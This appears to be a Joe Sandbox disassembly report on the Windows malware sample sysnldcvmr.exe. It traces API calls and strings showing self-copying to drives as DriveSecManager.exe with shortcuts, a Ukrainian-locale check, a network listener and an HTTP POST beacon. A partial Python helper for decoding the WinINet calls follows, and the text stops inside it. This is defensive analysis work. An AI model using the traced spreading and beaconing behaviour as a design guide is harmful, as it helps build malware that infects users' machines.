                                                                    • String ID:
                                                                    • API String ID: 2809346765-0
                                                                    • Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                    • Instruction ID: 45736cdf7257a26a41736574bf54bf9ad9d0bdd3ada43f241fa33aa1b29d5f37
                                                                    • Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
                                                                    • Instruction Fuzzy Hash: E201317490834DEFDB00CFA8C884BDD7BB4BB08314F148299E819A7381D3759695DB55
                                                                    APIs
                                                                      • Part of subcall function 0040B200: EnterCriticalSection.KERNEL32(00416690), ref: 0040B210
                                                                      • Part of subcall function 0040B200: LeaveCriticalSection.KERNEL32(00416690), ref: 0040B23C
                                                                    • WaitForSingleObject.KERNEL32(00000610,00001388), ref: 0040CEDC
                                                                      • Part of subcall function 0040CAD0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CADC
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 3309573332-0
                                                                    • Opcode ID: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                    • Instruction ID: 44ae0f0a1ed3c9862aadb4204bdd5a5f8f47b864d141f75822239993b39a6931
                                                                    • Opcode Fuzzy Hash: 12ca459a1005339a85f2975bee04b4d743ea4df3d22cee4e9c3de1405843334b
                                                                    • Instruction Fuzzy Hash: 91E0927094030CE6D714E7A1D846B6F722AA710305F14427EF501762C2DA7A9E40D7DC
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID:
                                                                    • API String ID: 542301482-0
                                                                    • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                    • Instruction ID: 4030d214640323180f81309a45cda4b6a66b11fae01bbf3bc15f759713f42cbd
                                                                    • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                    • Instruction Fuzzy Hash: 07E0ED74D0020CFFDF00DF94C889BDEBBB8AB04315F1081A9F90467280D7B56A94DB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1e9827fe68293e6897285389ea4db970e48dcd10d1f4aced94a3f78aca3421f0
                                                                    • Instruction ID: 66abf71bbc6bb8f29832275f6f9e93cbfca7bab132a793ca51917ff8eec0f9fe
                                                                    • Opcode Fuzzy Hash: 1e9827fe68293e6897285389ea4db970e48dcd10d1f4aced94a3f78aca3421f0
                                                                    • Instruction Fuzzy Hash: 49511D74600209DFDB04CF58C895FEA73A5FB48318F14817AED299B382D735EA52CB94
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID:
                                                                    • API String ID: 2221118986-0
                                                                    • Opcode ID: 3fd26d3f89756667c74fb30ff6c09527195665763de936d9e7706284fcb5180b
                                                                    • Instruction ID: 1007895d3f5dd07e883ba7e973a29537cb8d56efa9e6214bb7f3aa4e2946e06e
                                                                    • Opcode Fuzzy Hash: 3fd26d3f89756667c74fb30ff6c09527195665763de936d9e7706284fcb5180b
                                                                    • Instruction Fuzzy Hash: E6410BB8A00304DFD708DF44E881EAA7BB2FB89305B118269E8055B391D776E959CF99
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7fc1373019c28447f74aec52a80cbc38db19b8b353befe5cdb76d8d1002225a7
                                                                    • Instruction ID: 678e650cd2e28da927faa8218c892c0e8e24154ae7b50003a1efe540928fb777
                                                                    • Opcode Fuzzy Hash: 7fc1373019c28447f74aec52a80cbc38db19b8b353befe5cdb76d8d1002225a7
                                                                    • Instruction Fuzzy Hash: A1312FB5908108EBDB00CF54D885BE937B5AB44319F14817AE809AF383D379AE95DB89
                                                                    APIs
                                                                    • memcpy.NTDLL(?,?,00000100,?,?,?,00000000), ref: 00405D4C
                                                                      • Part of subcall function 00407310: memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                      • Part of subcall function 00407310: CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                      • Part of subcall function 00407310: CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$CloseCreateHandleThread
                                                                    • String ID:
                                                                    • API String ID: 241592544-0
                                                                    • Opcode ID: 773a56745138d3a706ef7e94f1b17aa5dcd045f1fceb3257cc2dff22dae358fc
                                                                    • Instruction ID: 301da727100d5b95795c90ba2c771f6cafa0cec544a9e9ac184ee71b37e309f2
                                                                    • Opcode Fuzzy Hash: 773a56745138d3a706ef7e94f1b17aa5dcd045f1fceb3257cc2dff22dae358fc
                                                                    • Instruction Fuzzy Hash: 74316F75E04208EFC704DF58D881BDE7BB5EB88304F08C1B9E9489B396D675AA91CB94
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID:
                                                                    • API String ID: 1475443563-0
                                                                    • Opcode ID: 6bbb8f22591a39984af44fa86822b38a7e3f546da9e004f0edcc7f5d2d3ffc0d
                                                                    • Instruction ID: b1bb87256b5efd3424f142900696306e848d82a89310f2b72aaba6d6d943d697
                                                                    • Opcode Fuzzy Hash: 6bbb8f22591a39984af44fa86822b38a7e3f546da9e004f0edcc7f5d2d3ffc0d
                                                                    • Instruction Fuzzy Hash: 4411EB75E042086BCB04DAA0C841AAEB779DF55308F04C07AED14AB3C1F639E616C79A
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef4e1d27d18917f5f02c76ffccb1a41be42f14630a9d4f53e8c10fdda0cde11a
                                                                    • Instruction ID: 0cf2f6210e35dd3a89e71b675bc4324d126efeeb08d8f7795bed3634c604d578
                                                                    • Opcode Fuzzy Hash: ef4e1d27d18917f5f02c76ffccb1a41be42f14630a9d4f53e8c10fdda0cde11a
                                                                    • Instruction Fuzzy Hash: 3411C1B5904208ABCB00DAA4DC02BEF77B59F14308F14847AF904B6282E6799714979E
                                                                    APIs
                                                                      • Part of subcall function 00406320: GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                    • lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: DriveTypelstrcpy
                                                                    • String ID:
                                                                    • API String ID: 3664088370-0
                                                                    • Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                    • Instruction ID: 8c00fedf36f089a4a79421f594ce94f1f5e858f4e01688578a9b7e0a2acaca41
                                                                    • Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
                                                                    • Instruction Fuzzy Hash: 96F01D75900208FBDB04DFA4D4557DEB7B4EF44304F14C5A9E819AB280E679AB58CB89
                                                                    APIs
                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                    • wsprintfW.USER32 ref: 00406768
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$C:\Windows\sysnldcvmr.exe$shell32.dll$shell32.dll
                                                                    • API String ID: 2467965697-1186605320
                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(ok@,00000000), ref: 0040657F
                                                                    • wsprintfW.USER32 ref: 00406595
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 004065AC
                                                                    • lstrcmpW.KERNEL32(?,00411108), ref: 004065D1
                                                                    • lstrcmpW.KERNEL32(?,0041110C), ref: 004065E7
                                                                    • wsprintfW.USER32 ref: 0040660A
                                                                    • wsprintfW.USER32 ref: 0040662A
                                                                    • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406666
                                                                    • FindNextFileW.KERNEL32(000000FF,?), ref: 0040667A
                                                                    • FindClose.KERNEL32(000000FF), ref: 0040668F
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00406699
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                    • String ID: %s\%s$%s\%s$%s\*$ok@
                                                                    • API String ID: 92872011-32713442
                                                                    • Opcode ID: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction ID: 6b6780eb73bc58f0ce40e07c43f053b4d902fc918dfc6bbc5558198ff1b4ac31
                                                                    • Opcode Fuzzy Hash: bdcae0db678ffea431cb11009663f4446319228456e5c176b7e99ad091f418f3
                                                                    • Instruction Fuzzy Hash: AB3127B5900218AFCB10DB60EC89FDA7778BB48701F4085A9F609A3195DB75DAD4CF58
                                                                    APIs
                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryQueryVirtual
                                                                    • String ID: oA$ oA$ oA
                                                                    • API String ID: 2850889275-3725432611
                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                    • strcmp.NTDLL ref: 0040E752
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocalestrcmp
                                                                    • String ID: UKR
                                                                    • API String ID: 3191669094-64918367
                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                    • String ID: PCOI$ilci
                                                                    • API String ID: 3345448188-3762367603
                                                                    • Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
                                                                    • Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
                                                                    • Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E518
                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
                                                                    • HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E701
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E70E
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040E71B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                    • API String ID: 2761394606-2217117414
                                                                    • Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
                                                                    • Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
                                                                    • Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54
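                                                                    The POST routine above records its WinINet arguments as raw hex, so the access type, the service and the header-modifier flags have to be decoded by hand to see what the client actually does. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the analysed sample: it parses entries in the report's "APIs" layout (assumed to be `<api>.<module>(<args>), ref: <addr>`), checks that the calls form a complete WinINet HTTP client in the right order, and names the constants using the public values from wininet.h. The embedded input is the POST routine's API list copied from the entry above; the helper names are mine.

```python
"""Decode the WinINet call chain recorded in a Joe Sandbox function entry.
Added example, not code from the report or the analysed sample.  Assumes the
report's API line layout '<api>.<module>(<args>), ref: <addr>'; constant names
and values are the public ones from wininet.h."""
import re
from dataclasses import dataclass

# Constructed input: the POST routine's API list, copied from the report entry.
SAMPLE = """APIs
• memset.NTDLL ref: 0040E518
• InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
• InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
• HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
• HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
• HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
• memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
• InternetCloseHandle.WININET(00000000), ref: 0040E701
Strings
"""

OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
ADDREQ_FLAGS = {0x10000000: "HTTP_ADDREQ_FLAG_ADD_IF_NEW", 0x20000000: "HTTP_ADDREQ_FLAG_ADD",
                0x40000000: "HTTP_ADDREQ_FLAG_COALESCE_WITH_COMMA", 0x80000000: "HTTP_ADDREQ_FLAG_REPLACE"}
CRACK_FLAGS = {0x10000000: "ICU_DECODE", 0x80000000: "ICU_ESCAPE"}
# Stages that must occur in this order for a complete WinINet HTTP client.
HTTP_CHAIN = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile"]

_LINE = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    subcall: bool = False  # True for 'Part of subcall function ...' lines


def _split_args(s):
    """Split on top-level commas only, so a user agent such as
    'Mozilla/4.0 (compatible; ...)' stays in one piece."""
    out, cur, depth = [], [], 0
    for ch in s:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if s:
        out.append("".join(cur).strip())
    return out


def parse_apis(text):
    """Return the Call records found in one 'APIs' listing; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            args = _split_args(m.group("args")) if m.group("args") is not None else []
            calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), "Part of subcall" in line))
    return calls


def _hex(a):
    try:
        return int(a, 16)
    except ValueError:  # '?' (unknown) or a literal string such as POST
        return None


def _flags(value, table):
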